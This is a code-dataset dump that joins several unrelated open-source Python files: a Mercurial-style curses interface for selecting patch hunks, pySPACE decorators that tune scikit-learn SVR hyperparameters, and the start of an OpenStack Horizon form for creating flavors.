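    # a three-line hunk leaves the hunk and its header applied but marks both
    # as partial, which getstatusprefixstring() renders as "[~]".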
def toggleall(self):
"toggle the applied flag of all items."
if self.waslasttoggleallapplied: # then unapply them this time
for item in self.headerlist:
if item.applied:
self.toggleapply(item)
else:
for item in self.headerlist:
if not item.applied:
self.toggleapply(item)
self.waslasttoggleallapplied = not self.waslasttoggleallapplied
def togglefolded(self, item=None, foldparent=False):
"toggle folded flag of specified item (defaults to currently selected)"
if item is None:
item = self.currentselecteditem
if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
if not isinstance(item, uiheader):
# we need to select the parent item in this case
self.currentselecteditem = item = item.parentitem()
elif item.neverunfolded:
item.neverunfolded = False
# also fold any foldable children of the parent/current item
if isinstance(item, uiheader): # the original or 'new' item
for child in item.allchildren():
child.folded = not item.folded
if isinstance(item, (uiheader, uihunk)):
item.folded = not item.folded
def alignstring(self, instr, window):
"""
add whitespace to the end of a string in order to make it fill
the screen in the x direction. the current cursor position is
taken into account when making this calculation. the string can span
multiple lines.
"""
y, xstart = window.getyx()
width = self.xscreensize
# turn tabs into spaces
instr = instr.expandtabs(4)
strwidth = encoding.colwidth(pycompat.decodeutf8(instr, errors="replace"))
numspaces = width - ((strwidth + xstart) % width) - 1
return instr + b" " * numspaces + b"\n"
def printstring(
self,
window,
text,
fgcolor=None,
bgcolor=None,
pair=None,
pairname=None,
attrlist=None,
towin=True,
align=True,
showwhtspc=False,
):
"""
print the string, text, with the specified colors and attributes, to
the specified curses window object.
the foreground and background colors are of the form
curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
magenta, red, white, yellow]. if pairname is provided, a color
pair will be looked up in the self.colorpairnames dictionary.
attrlist is a list containing text attributes in the form of
curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
underline].
if align == True, whitespace is added to the printed string such that
the string stretches to the right border of the window.
if showwhtspc == True, trailing whitespace of a string is highlighted.
"""
# preprocess the text, converting tabs to spaces
text = text.expandtabs(4)
# strip \n, and convert control characters to ^[char] representation
text = text.strip(b"\n")
text = re.sub(
br"[\x00-\x08\x0a-\x1f]",
lambda m: b"^%s" % bytearray([ord(m.group()) + 64]),
text,
)
if pair is not None:
colorpair = pair
elif pairname is not None:
colorpair = self.colorpairnames[pairname]
else:
if fgcolor is None:
fgcolor = -1
if bgcolor is None:
bgcolor = -1
if (fgcolor, bgcolor) in self.colorpairs:
colorpair = self.colorpairs[(fgcolor, bgcolor)]
else:
colorpair = self.getcolorpair(fgcolor, bgcolor)
# add attributes if possible
if attrlist is None:
attrlist = []
if colorpair < 256:
# then it is safe to apply all attributes
for textattr in attrlist:
colorpair |= textattr
else:
# just apply a select few (safe?) attributes
for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
if textattr in attrlist:
colorpair |= textattr
y, xstart = self.chunkpad.getyx()
t = b"" # variable for counting lines printed
# if requested, show trailing whitespace
if showwhtspc:
origlen = len(text)
text = text.rstrip(b" \n") # tabs have already been expanded
strippedlen = len(text)
numtrailingspaces = origlen - strippedlen
if towin:
window.addstr(text, colorpair)
t += text
if showwhtspc:
wscolorpair = colorpair | curses.A_REVERSE
if towin:
for i in range(numtrailingspaces):
window.addch(curses.ACS_CKBOARD, wscolorpair)
t += b" " * numtrailingspaces
if align:
if towin:
extrawhitespace = self.alignstring(b"", window)
window.addstr(extrawhitespace, colorpair)
else:
# need to use t, since the x position hasn't incremented
extrawhitespace = self.alignstring(t, window)
t += extrawhitespace
# is reset to 0 at the beginning of printitem()
linesprinted = (xstart + len(t)) // self.xscreensize
self.linesprintedtopadsofar += linesprinted
return t
def _getstatuslinesegments(self):
"""-> [str]. return segments"""
selected = self.currentselecteditem.applied
spaceselect = _("space: select")
spacedeselect = _("space: deselect")
# Format the selected label into a place as long as the longer of the
# two possible labels. This may vary by language.
spacelen = max(len(spaceselect), len(spacedeselect))
selectedlabel = "%-*s" % (spacelen, spacedeselect if selected else spaceselect)
segments = [
_headermessages[self.operation],
"-",
_("[x]=selected **=collapsed"),
_("c: confirm"),
_("q: abort"),
_("arrow keys: move/expand/collapse"),
selectedlabel,
_("?: help"),
]
return segments
def _getstatuslines(self):
"""() -> [str]. return short help used in the top status window"""
if self.errorstr is not None:
lines = [self.errorstr, _("Press any key to continue")]
else:
# wrap segments to lines
segments = self._getstatuslinesegments()
width = self.xscreensize
lines = []
lastwidth = width
for s in segments:
w = encoding.colwidth(s)
sep = " " * (1 + (s and s[0] not in "-["))
if lastwidth + w + len(sep) >= width:
lines.append(s)
lastwidth = w
else:
lines[-1] += sep + s
lastwidth += w + len(sep)
if len(lines) != self.numstatuslines:
self.numstatuslines = len(lines)
self.statuswin.resize(self.numstatuslines, self.xscreensize)
return [util.ellipsis(l, self.xscreensize - 1) for l in lines]
def updatescreen(self):
self.statuswin.erase()
self.chunkpad.erase()
printstring = self.printstring
# print out the status lines at the top
try:
for line in self._getstatuslines():
printstring(
self.statuswin,
pycompat.encodeutf8(line),
pairname="legend",
attrlist=[curses.A_BOLD],
)
self.statuswin.refresh()
except curses.error:
pass
if self.errorstr is not None:
return
# print out the patch in the remaining part of the window
try:
self.printitem()
self.updatescroll()
self.chunkpad.refresh(
self.firstlineofpadtoprint,
0,
self.numstatuslines,
0,
self.yscreensize - self.numstatuslines,
max([self.xscreensize - 1, 0]),
)
except curses.error:
pass
def getstatusprefixstring(self, item):
"""
create a string to prefix a line with which indicates whether 'item'
is applied and/or folded.
"""
# create checkbox string
if item.applied:
if not isinstance(item, uihunkline) and item.partial:
checkbox = b"[~]"
else:
checkbox = b"[x]"
else:
checkbox = b"[ ]"
try:
if item.folded:
checkbox += b"**"
if isinstance(item, uiheader):
# one of "m", "a", or "d" (modified, added, deleted)
filestatus = item.changetype
checkbox += filestatus + b" "
else:
checkbox += b" "
if isinstance(item, uiheader):
# add two more spaces for headers
checkbox += b" "
except AttributeError: # not foldable
checkbox += b" "
return checkbox
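    # Illustrative examples (added for clarity): a folded, fully applied
    # header for a modified file is prefixed with "[x]**m ", an unfolded
    # partially applied hunk with "[~] ", and an unselected hunk-line with
    # "[ ] ".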
def printheader(self, header, selected=False, towin=True, ignorefolding=False):
"""
        print the header to the pad. if towin is False, don't print anything
        to the pad, but just return the string that would have been printed
        (used for counting lines).
"""
outstr = b""
text = header.prettystr()
chunkindex = self.chunklist.index(header)
if chunkindex != 0 and not header.folded:
# add separating line before headers
outstr += self.printstring(
self.chunkpad, b"_" * self.xscreensize, towin=towin, align=False
)
# select color-pair based on if the header is selected
colorpair = self.getcolorpair(
name=selected and "selected" or "normal",
attrlist=selected and [curses.A_BOLD] or [],
)
# print out each line of the chunk, expanding it to screen width
# number of characters to indent lines on this level by
indentnumchars = 0
checkbox = self.getstatusprefixstring(header)
if not header.folded or ignorefolding:
textlist = text.split(b"\n")
linestr = checkbox + textlist[0]
else:
linestr = checkbox + pycompat.encodeutf8(header.filename())
outstr += self.printstring(self.chunkpad, linestr, pair=colorpair, towin=towin)
if not header.folded or ignorefolding:
if len(textlist) > 1:
for line in textlist[1:]:
linestr = b" " * (indentnumchars + len(checkbox)) + line
outstr += self.printstring(
self.chunkpad, linestr, pair=colorpair, towin=towin
)
return outstr
def printhunklinesbefore(
self, hunk, selected=False, towin=True, ignorefolding=False
):
"includes start/end line indicator"
outstr = b""
# where hunk is in list of siblings
hunkindex = hunk.header.hunks.index(hunk)
if hunkindex != 0:
# add separating line before headers
outstr += self.printstring(
self.chunkpad, b" " * self.xscreensize, towin=towin, align=False
)
colorpair = self.getcolorpair(
name=selected and "selected" or "hunk",
attrlist=selected and [curses.A_BOLD] or [],
)
# print out from-to line with checkbox
checkbox = self.getstatusprefixstring(hunk)
lineprefix = b" " * self.hunkindentnumchars + checkbox
frtoline = b" " + hunk.getfromtoline().strip(b"\n")
outstr += self.printstring(
self.chunkpad, lineprefix, towin=towin, align=False
) # add uncolored checkbox/indent
outstr += self.printstring(self.chunkpad, frtoline, pair=colorpair, towin=towin)
if hunk.folded and not ignorefolding:
# skip remainder of output
return outstr
        # print out lines of the chunk preceding changed-lines
for line in hunk.before:
linestr = b" " * (self.hunklineindentnumchars + len(checkbox)) + line
outstr += self.printstring(self.chunkpad, linestr, towin=towin)
return outstr
def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
outstr = b""
if hunk.folded and not ignorefolding:
return outstr
# a bit superfluous, but to avoid hard-coding indent amount
checkbox = self.getstatusprefixstring(hunk)
for line in hunk.after:
linestr = b" " * (self.hunklineindentnumchars + len(checkbox)) + line
outstr += self.printstring(self.chunkpad, linestr, towin=towin)
return outstr
def printhunkchangedline(self, hunkline, selected=False, towin=True):
outstr = b""
checkbox = self.getstatusprefixstring(hunkline)
linestr = hunkline.prettystr().strip(b"\n")
# select color-pair based on whether line is an addition/removal
if selected:
colorpair = self.getcolorpair(name="selected", attrlist=[curses.A_BOLD])
elif linestr.startswith(b"+"):
colorpair = self.getcolorpair(name="addition")
elif linestr.startswith(b"-"):
colorpair = self.getcolorpair(name="deletion")
elif linestr.startswith(b"\\"):
colorpair = self.getcolorpair(name="normal")
lineprefix = b" " * self.hunklineindentnumchars + checkbox
outstr += self.printstring(
self.chunkpad, lineprefix, towin=towin, align=False
) # add uncolored checkbox/indent
outstr += self.printstring(
self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
)
return outstr
def printitem(
self, item=None, ignorefolding=False, recursechildren=True, towin=True
):
"""
        use __printitem() to print the specified item.
if item is not specified, then print the entire patch.
(hiding folded elements, etc. -- see __printitem() docstring)
"""
if item is None:
item = self.headerlist
if recursechildren:
self.linesprintedtopadsofar = 0
outstr = []
self.__printitem(item, ignorefolding, recursechildren, outstr, towin=towin)
return b"".join(outstr)
def outofdisplayedarea(self):
y, _ = self.chunkpad.getyx() # cursor location
# * 2 here works but an optimization would be the max number of
# consecutive non selectable lines
# i.e the max number of context line for any hunk in the patch
miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
maxy = self.firstlineofpadtoprint + self.yscreensize * 2
return y < miny or y > maxy
def handleselection(self, item, recursechildren):
selected = item is self.currentselecteditem
if selected and recursechildren:
# assumes line numbering starting from line 0
self.selecteditemstartline = self.linesprintedtopadsofar
selecteditemlines = self.getnumlinesdisplayed(item, recursechildren=False)
self.selecteditemendline = (
self.selecteditemstartline + selecteditemlines - 1
)
return selected
def __printitem(self, item, ignorefolding, recursechildren, outstr, towin=True):
"""
recursive method for printing out patch/header/hunk/hunk-line data to
screen. also returns a string with all of the content of the displayed
patch (not including coloring, etc.).
if ignorefolding is True, then folded items are printed out.
if recursechildren is False, then only print the item without its
child items.
"""
if towin and self.outofdisplayedarea():
return
selected = self.handleselection(item, recursechildren)
# patch object is a list of headers
if isinstance(item, patch):
if recursechildren:
for hdr in item:
self.__printitem(hdr, ignorefolding, recursechildren, outstr, towin)
# todo: eliminate all isinstance() calls
if isinstance(item, uiheader):
outstr.append(
self.printheader(
item, selected, towin=towin, ignorefolding=ignorefolding
)
)
if recursechildren:
for hnk in item.hunks:
self.__printitem(hnk, ignorefolding, recursechildren, outstr, towin)
elif isinstance(item, uihunk) and ((not item.header.folded) or ignorefolding):
# print the hunk data which comes before the changed-lines
outstr.append(
self.printhunklinesbefore(
item, selected, towin=towin, ignorefolding=ignorefolding
)
)
if recursechildren:
for l in item.changedlines:
self.__printitem(l, ignorefolding, recursechildren, outstr, towin)
outstr.append(
self.printhunklinesafter(
item, towin=towin, ignorefolding=ignorefolding
)
)
elif isinstance(item, uihunkline) and ((not item.hunk.folded) or ignorefolding):
outstr.append(self.printhunkchangedline(item, selected, towin=towin))
return outstr
def getnumlinesdisplayed(
self, item=None, ignorefolding=False, recursechildren=True
):
"""
return the number of lines which would be displayed if the item were
to be printed to the display. the item will not be printed to the
display (pad).
if no item is given, assume the entire patch.
if ignorefolding is True, folded items will be unfolded when counting
the number of lines.
"""
# temporarily disable printing to windows by printstring
patchdisplaystring = self.printitem(
item, ignorefolding, recursechildren, towin=False
)
numlines = len(patchdisplaystring) // self.xscreensize
return numlines
def sigwinchhandler(self, n, frame):
"handle window resizing"
try:
curses.endwin()
self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
self.statuswin.resize(self.numstatuslines, self.xscreensize)
self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
except curses.error:
pass
def getcolorpair(self, fgcolor=None, bgcolor=None, name=None, attrlist=None):
"""
get a curses color pair, adding it to self.colorpairs if it is not
already defined. an optional string, name, can be passed as a shortcut
for referring to the color-pair. by default, if no arguments are
specified, the white foreground / black background color-pair is
returned.
it is expected that this function will be used exclusively for
initializing color pairs, and not curses.init_pair().
attrlist is used to 'flavor' the returned color-pair. this information
is not stored in self.colorpairs. it contains attribute values like
curses.A_BOLD.
"""
if (name is not None) and name in self.colorpairnames:
# then get the associated color pair and return it
colorpair = self.colorpairnames[name]
else:
if fgcolor is None:
fgcolor = -1
if bgcolor is None:
bgcolor = -1
if (fgcolor, bgcolor) in self.colorpairs:
colorpair = self.colorpairs[(fgcolor, bgcolor)]
else:
pairindex = len(self.colorpairs) + 1
curses.init_pair(pairindex, fgcolor, bgcolor)
colorpair = self.colorpairs[(fgcolor, bgcolor)] = curses.color_pair(
pairindex
)
if name is not None:
self.colorpairnames[name] = curses.color_pair(pairindex)
# add attributes if possible
if attrlist is None:
attrlist = []
if colorpair < 256:
# then it is safe to apply all attributes
for textattr in attrlist:
colorpair |= textattr
else:
# just apply a select few (safe?) attributes
for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
if textattrib in attrlist:
colorpair |= textattrib
return colorpair
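    # Illustrative example (added for clarity): a first call such as
    # getcolorpair(curses.COLOR_RED, None, name="deletion") allocates a new
    # curses pair via init_pair(); later calls passing name="deletion" or the
    # same (fgcolor, bgcolor) combination reuse the cached pair.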
def initcolorpair(self, *args, **kwargs):
"same as getcolorpair."
self.getcolorpair(*args, **kwargs)
def helpwindow(self):
"print a help window to the screen. exit after any keypress."
helptext = _(
""" [press any key to return to the patch-display]
crecord allows you to interactively choose among the changes you have made,
and confirm only those changes you select for further processing by the command
you are running (commit/shelve/revert). after confirming the selected
changes, the unselected changes are still present in your working copy, so you
can use crecord multiple times to split large changes into smaller changesets.
the following are valid keystrokes:
[space] : (un-)select item ([~]/[x] = partly/fully applied)
A : (un-)select all items
up/down-arrow [k/j] : go to previous/next unfolded item
pgup/pgdn [K/J] : go to previous/next item of same type
right/left-arrow [l/h] : go to child item / parent item
shift-left-arrow [H] : go to parent header / fold selected header
f : fold / unfold item, hiding/revealing its children
F : fold / unfold parent item and all of its ancestors
ctrl-l : scroll the selected line to the top of the screen
m : edit / resume editing the commit message
e : edit the currently selected hunk
a : toggle amend mode, only with commit -i
c : confirm selected changes
r : review/edit and confirm selected changes
q : quit without confirming (no changes will be made)
? : help (what you're currently reading)"""
)
helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
helplines = helptext.split("\n")
helplines = helplines + [" "] * (
self.yscreensize - self.numstatuslines - len(helplines) - 1
)
try:
for line in helplines:
self.printstring(
helpwin,
pycompat.encodeutf8(line),
pairname="legend",
attrlist=[curses.A_BOLD],
)
except curses.error:
pass
helpwin.refresh()
try:
with self.ui.timeblockedsection("crecord"):
helpwin.getkey()
except curses.error:
pass
def commitMessageWindow(self):
"Create a temporary commit message editing window on the screen."
curses.raw()
curses.def_prog_mode()
curses.endwin()
self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
curses.cbreak()
self.stdscr.refresh()
self.stdscr.keypad(1) # allow arrow-keys to continue to function
def confirmationwindow(self, windowtext):
"display an informational window, then wait for and return a keypress."
confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
windowtext = pycompat.encodeutf8(windowtext)
try:
lines = windowtext.split(b"\n")
for line in lines:
self.printstring(confirmwin, line, pairname="selected")
except curses.error:
pass
self.stdscr.refresh()
confirmwin.refresh()
try:
with self.ui.timeblockedsection("crecord"):
response = chr(self.stdscr.getch())
except ValueError:
response = None
return response
def reviewcommit(self):
"""ask for 'y' to be pressed to confirm selected. return True if
confirmed."""
confirmtext = _(
"""if you answer yes to the following, the your currently chosen patch chunks
will be loaded into an editor. you may modify the patch from the editor, and
save the changes if you wish to change the patch. otherwise, you can just
close the editor without saving to accept the current patch as-is.
note: don't add/remove lines unless you also modify the range information.
failing to follow this rule will result in the commit aborting.
are you sure you want to review/edit and confirm the selected changes [yn]?
"""
)
with self.ui.timeblockedsection("crecord"):
response = self.confirmationwindow(confirmtext)
if response is None:
response = "n"
if response.lower().startswith("y"):
return True
else:
return False
def toggleamend(self, opts, test):
"""Toggle the amend flag.
When the amend flag is set, a commit will modify the most recently
committed changeset, instead of creating a new changeset. Otherwise, a
new changeset will be created (the normal commit behavior).
"""
if opts.get("amend") is None:
opts["amend"] = True
msg = _(
"Amend option is turned on -- committing the currently "
"selected changes will not create a new changeset, but "
"instead update the most recently committed changeset.\n\n"
"Press any key to continue."
)
elif opts.get("amend") is True:
opts["amend"] = None
msg = _(
"Amend option is turned off -- committing the currently "
"selected changes will create a new changeset.\n\n"
"Press any key to continue."
)
if not test:
self.confirmationwindow(msg)
def recenterdisplayedarea(self):
"""
        once we have scrolled with pg up/pg down we can be pointing outside of the
display zone. we print the patch with towin=False to compute the
location of the selected item even though it is outside of the displayed
zone and then update the scroll.
"""
self.printitem(towin=False)
self.updatescroll()
def toggleedit(self, item=None, test=False):
"""
edit the currently selected chunk
"""
def updateui(self):
self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
self.updatescroll()
self.stdscr.refresh()
self.statuswin.refresh()
self.stdscr.keypad(1)
def editpatchwitheditor(self, chunk):
if chunk is None:
self.ui.write(_("cannot edit patch for whole file"))
self.ui.write("\n")
return None
if chunk.header.binary():
self.ui.write(_("cannot edit patch for binary file"))
self.ui.write("\n")
return None
# write the initial patch
patch = stringio()
patch.write(pycompat.encodeutf8(diffhelptext + hunkhelptext))
chunk.header.write(patch)
chunk.write(patch)
# start the editor and wait for it to complete
try:
patch = pycompat.encodeutf8(
self.ui.edit(
pycompat.decodeutf8(patch.getvalue()), "", action="diff"
)
)
except error.Abort as exc:
self.errorstr = str(exc)
return None
# remove comment lines
patch = [
line + b"\n" for line in patch.splitlines() if not line.startswith(b"#")
]
return patchmod.parsepatch(patch)
if item is None:
item = self.currentselecteditem
if isinstance(item, uiheader):
return
if isinstance(item, uihunkline):
item = item.parentitem()
if not isinstance(item, uihunk):
return
# To go back to that hunk or its replacement at the end of the edit
itemindex = item.parentitem().hunks.index(item)
beforeadded, beforeremoved = item.added, item.removed
newpatches = editpatchwitheditor(self, item)
if newpatches is None:
if not test:
updateui(self)
return
header = item.header
editedhunkindex = header.hunks.index(item)
hunksbefore = header.hunks[:editedhunkindex]
hunksafter = header.hunks[editedhunkindex + 1 :]
newpatchheader = newpatches[0]
newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
newadded = sum([h.added for h in newhunks])
newremoved = sum([h.removed for h in newhunks])
offset = (newadded - beforeadded) - (newremoved - beforeremoved)
for h in hunksafter:
h.toline += offset
for h in newhunks:
h.folded = False
header.hunks = hunksbefore + newhunks + hunksafter
if self.emptypatch():
header.hunks = hunksbefore + [item] + hunksafter
self.currentselecteditem = header
if len(header.hunks) > itemindex:
self.currentselecteditem = header.hunks[itemindex]
if not test:
updateui(self)
def emptypatch(self):
item = self.headerlist
if not item:
return True
for header in item:
if header.hunks:
return False
return True
def handlekeypressed(self, keypressed, test=False):
"""
Perform actions based on pressed keys.
Return true to exit the main loop.
"""
if keypressed in ["k", "KEY_UP", "KEY_A2"]:
self.uparrowevent()
elif keypressed in ["K", "KEY_PPAGE", "KEY_A3"]:
self.uparrowshiftevent()
elif keypressed in ["j", "KEY_DOWN", "KEY_C2"]:
self.downarrowevent()
elif keypressed in ["J", "KEY_NPAGE", "KEY_C3"]:
self.downarrowshiftevent()
elif keypressed in ["l", "KEY_RIGHT", "KEY_B3"]:
self.rightarrowevent()
elif keypressed in ["h", "KEY_LEFT", "KEY_B1"]:
self.leftarrowevent()
elif keypressed in ["H", "KEY_SLEFT"]:
self.leftarrowshiftevent()
elif keypressed in ["q"]:
raise error.Abort(_("user quit"))
elif keypressed in ["a"]:
self.toggleamend(self.opts, test)
elif keypressed in ["c"]:
return True
elif test and keypressed in ["X"]:
return True
elif keypressed in ["r"]:
if self.reviewcommit():
self.opts["review"] = True
return True
elif test and keypressed in ["R"]:
self.opts["review"] = True
return True
elif keypressed in [" "] or (test and keypressed in ["TOGGLE"]):
self.toggleapply()
if self.ui.configbool("experimental", "spacemovesdown"):
self.downarrowevent()
elif keypressed in ["A"]:
self.toggleall()
elif keypressed in ["e"]:
self.toggleedit(test=test)
elif keypressed in ["f"]:
self.togglefolded()
elif keypressed in ["F"]:
self.togglefolded(foldparent=True)
elif keypressed in ["m"]:
self.commitMessageWindow()
elif keypressed in ["?"]:
self.helpwindow()
self.stdscr.clear()
self.stdscr.refresh()
else:
try:
if len(keypressed) == 1 and curses.unctrl(keypressed) in [b"^L"]:
# scroll the current line to the top of the screen
self.scrolllines(self.selecteditemstartline)
except OverflowError:
                # curses sometimes throws an "OverflowError: byte doesn't fit in
# chtype" error.
pass
def main(self, stdscr):
"""
method to be wrapped by curses.wrapper() for selecting chunks.
"""
origsigwinch = sentinel = object()
if util.safehasattr(signal, "SIGWINCH"):
origsigwinch = util.signal(signal.SIGWINCH, self.sigwinchhandler)
try:
return self._main(stdscr)
finally:
if origsigwinch is not sentinel:
util.signal(signal.SIGWINCH, origsigwinch)
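    # Illustrative note (added for clarity; not part of the original module):
    # a caller is expected to hand main() to curses.wrapper(), which sets up
    # and tears down the terminal and passes the initialized stdscr in, e.g.
    #
    #     curses.wrapper(chunkselector.main)
    #
    # where "chunkselector" is an already-constructed instance of this class;
    # the variable name is an assumption for illustration only.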
def _main(self, stdscr):
self.stdscr = stdscr
# error during initialization, cannot be printed in the curses
# interface, it should be printed by the calling code
self.initerr = None
self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
curses.start_color()
curses.use_default_colors()
# available colors: black, blue, cyan, green, magenta, white, yellow
# init_pair(color_id, foreground_color, background_color)
self.initcolorpair(None, None, name="normal")
self.initcolorpair(curses.COLOR_WHITE, curses.COLOR_MAGENTA, name="selected")
self.initcolorpair(curses.COLOR_RED, None, name="deletion")
self.initcolorpair(curses.COLOR_GREEN, None, name="addition")
self.initcolorpair(curses.COLOR_WHITE, curses.COLOR_BLUE, name="legend")
self.initcolorpair(curses.COLOR_MAGENTA, None, name="hunk")
# newwin([height, width,] begin_y, begin_x)
self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
# figure out how much space to allocate for the chunk-pad which is
# used for displaying the patch
# stupid hack to prevent getnumlinesdisplayed from failing
self.chunkpad = curses.newpad(1, self.xscreensize)
        # add 1 to account for the last line of text reaching the end of the line
self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
try:
self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
except curses.error:
self.initerr = _("this diff is too large to be displayed")
return
# initialize selecteditemendline (initial start-line is 0)
self.selecteditemendline = self.getnumlinesdisplayed(
self.currentselecteditem, recursechildren=False
)
while True:
self.updatescreen()
try:
with self.ui.timeblockedsection("crecord"):
keypressed = self.statuswin.getkey()
if self.errorstr is not None:
self.errorstr = None
continue
except curses.error:
keypressed = "foobar"
if self.handlekeypressed(keypressed):
break
if self.commenttext != "":
            whitespaceremoved = re.sub(r"(?m)^\s.*(\n|$)", "", self.commenttext)
if whitespaceremoved != "":
self.opts["message"] = self.commenttext
| gpl-2.0 | 1,711,821,608,135,230,500 | 35.707609 | 89 | 0.588271 | false |
MMKrell/pyspace | pySPACE/missions/nodes/regression/scikit_decorators.py | 2 | 2653 | """ Scikit decorators for optimizing hyperparameters """
from pySPACE.missions.nodes import DEFAULT_NODE_MAPPING, NODE_MAPPING
# noinspection PyUnresolvedReferences
from pySPACE.missions.nodes.scikit_nodes import SVRRegressorSklearnNode
from pySPACE.missions.nodes.decorators import LogUniformParameter, LogNormalParameter,\
ChoiceParameter, QLogUniformParameter, NoOptimizationParameter
from pySPACE.missions.nodes import scikit_nodes
@LogUniformParameter("C", min_value=1e-6, max_value=1e6)
@LogNormalParameter("epsilon", shape=0.1 / 2, scale=0.1)
@ChoiceParameter("kernel",choices=["linear", "rbf", "poly", "sigmoid", "precomputed"])
# degree: int, default: 3
@LogUniformParameter("gamma", min_value=1e-6, max_value=1e3)
# coef0: float, default: 0.0
@NoOptimizationParameter("shrinking")
# tol: float, default: 1e-3
@NoOptimizationParameter("cache_size")
@NoOptimizationParameter("verbose")
@QLogUniformParameter("max_iter", min_value=1, max_value=1e6, q=1)
class OptSVRRegressorSklearnNode(SVRRegressorSklearnNode):
__doc__ = "Decorator wrapper around %s \n\n %s" % \
(SVRRegressorSklearnNode.__name__, SVRRegressorSklearnNode.__doc__)
def __init__(self, C=1, epsilon=0.1, kernel="rbf", degree=3, gamma="auto", coef0=0.0, shrinking=True, tol=1e-3,
verbose=False, max_iter=-1, **kwargs):
super(OptSVRRegressorSklearnNode, self).__init__(C=C, epsilon=epsilon, kernel=kernel, degree=int(degree),
gamma=gamma, coef0=coef0, shrinking=shrinking, tol=tol,
verbose=verbose, max_iter=int(max_iter),
**kwargs)
try:
from svext import SVR as IncSVR
inc_svr = scikit_nodes.wrap_scikit_predictor(IncSVR)
class OptIncSVRRegressorSklearnNode(inc_svr):
def __init__(self, C=1, epsilon=0.1, kernel="rbf", degree=3, gamma="auto", coef0=0.0, shrinking=True, tol=1e-3,
verbose=False, max_iter=-1, **kwargs):
super(OptIncSVRRegressorSklearnNode, self).__init__(C=C, epsilon=epsilon, kernel=kernel, degree=int(degree),
gamma=gamma, coef0=coef0, shrinking=shrinking, tol=tol,
verbose=verbose, max_iter=int(max_iter),
**kwargs)
DEFAULT_NODE_MAPPING[inc_svr.__name__] = inc_svr
NODE_MAPPING[inc_svr.__name__] = inc_svr
NODE_MAPPING[inc_svr.__name__[:-4]] = inc_svr
except ImportError:
pass
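
# Minimal usage sketch (added for illustration; not part of the original
# module). It relies only on the constructor signature defined above; the
# concrete hyperparameter values are arbitrary assumptions:
#
#     node = OptSVRRegressorSklearnNode(C=10.0, epsilon=0.05, kernel="rbf",
#                                       gamma=0.01)
#
# The *Parameter decorators declare the search ranges an external
# hyperparameter optimizer may explore; they do not themselves change the
# values passed to the constructor.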
| gpl-3.0 | -498,357,951,437,703,100 | 51.019608 | 120 | 0.620053 | false |
Daniex/horizon | openstack_dashboard/dashboards/admin/flavors/workflows.py | 43 | 12939 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard import api
class CreateFlavorInfoAction(workflows.Action):
_flavor_id_regex = (r'^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-'
r'[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|[0-9]+|auto$')
_flavor_id_help_text = _("Flavor ID should be UUID4 or integer. "
"Leave this field blank or use 'auto' to set "
"a random UUID4.")
name = forms.RegexField(
label=_("Name"),
max_length=255,
regex=r'^[\w\.\- ]+$',
error_messages={'invalid': _('Name may only contain letters, numbers, '
'underscores, periods and hyphens.')})
flavor_id = forms.RegexField(label=_("ID"),
regex=_flavor_id_regex,
required=False,
initial='auto',
help_text=_flavor_id_help_text)
vcpus = forms.IntegerField(label=_("VCPUs"),
min_value=1)
memory_mb = forms.IntegerField(label=_("RAM (MB)"),
min_value=1)
disk_gb = forms.IntegerField(label=_("Root Disk (GB)"),
min_value=0)
eph_gb = forms.IntegerField(label=_("Ephemeral Disk (GB)"),
min_value=0)
swap_mb = forms.IntegerField(label=_("Swap Disk (MB)"),
min_value=0)
class Meta(object):
name = _("Flavor Information")
help_text = _("Flavors define the sizes for RAM, disk, number of "
"cores, and other resources and can be selected when "
"users deploy instances.")
def clean(self):
cleaned_data = super(CreateFlavorInfoAction, self).clean()
name = cleaned_data.get('name')
flavor_id = cleaned_data.get('flavor_id')
try:
flavors = api.nova.flavor_list(self.request, None)
except Exception:
flavors = []
msg = _('Unable to get flavor list')
exceptions.check_message(["Connection", "refused"], msg)
raise
if flavors is not None:
for flavor in flavors:
if flavor.name == name:
raise forms.ValidationError(
_('The name "%s" is already used by another flavor.')
% name
)
if flavor.id == flavor_id:
raise forms.ValidationError(
_('The ID "%s" is already used by another flavor.')
% flavor_id
)
return cleaned_data
class CreateFlavorInfo(workflows.Step):
action_class = CreateFlavorInfoAction
contributes = ("flavor_id",
"name",
"vcpus",
"memory_mb",
"disk_gb",
"eph_gb",
"swap_mb")
class UpdateFlavorAccessAction(workflows.MembershipAction):
def __init__(self, request, *args, **kwargs):
super(UpdateFlavorAccessAction, self).__init__(request,
*args,
**kwargs)
err_msg = _('Unable to retrieve flavor access list. '
'Please try again later.')
context = args[0]
default_role_field_name = self.get_default_role_field_name()
self.fields[default_role_field_name] = forms.CharField(required=False)
self.fields[default_role_field_name].initial = 'member'
